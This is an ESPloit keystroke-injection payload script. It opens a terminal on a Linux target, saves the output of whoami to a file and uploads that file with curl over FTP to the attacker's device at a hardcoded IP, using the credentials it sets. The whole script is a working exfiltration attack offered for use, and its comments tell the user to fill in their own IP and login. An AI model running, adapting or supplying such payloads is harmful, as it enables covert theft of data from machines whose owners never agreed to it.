Rem: Exfiltrate UserName from Linux Box
Rem: ESPloit and Target must be connected to the same network for this to work
Rem: Set the IP/User/Pass of ESPloit below by modifying "export xip='192.168.1.1'", "ftpuser='ftp-admin'", and "ftppass='hacktheplanet'"
Press:134+195
PrintLine:gnome-terminal
PrintLine:export xfile='LinuxUser.txt'; export ftpuser='ftp-admin'; export ftppass='hacktheplanet'; data="$(whoami)"; echo ${data}>${xfile}; export xip='192.168.1.1'
Rem: Wait for FTP server to be ready
CustomDelay:5000
PrintLine:curl -T ${xfile} ftp://${ftpuser}:${ftppass}@${xip}/${xfile}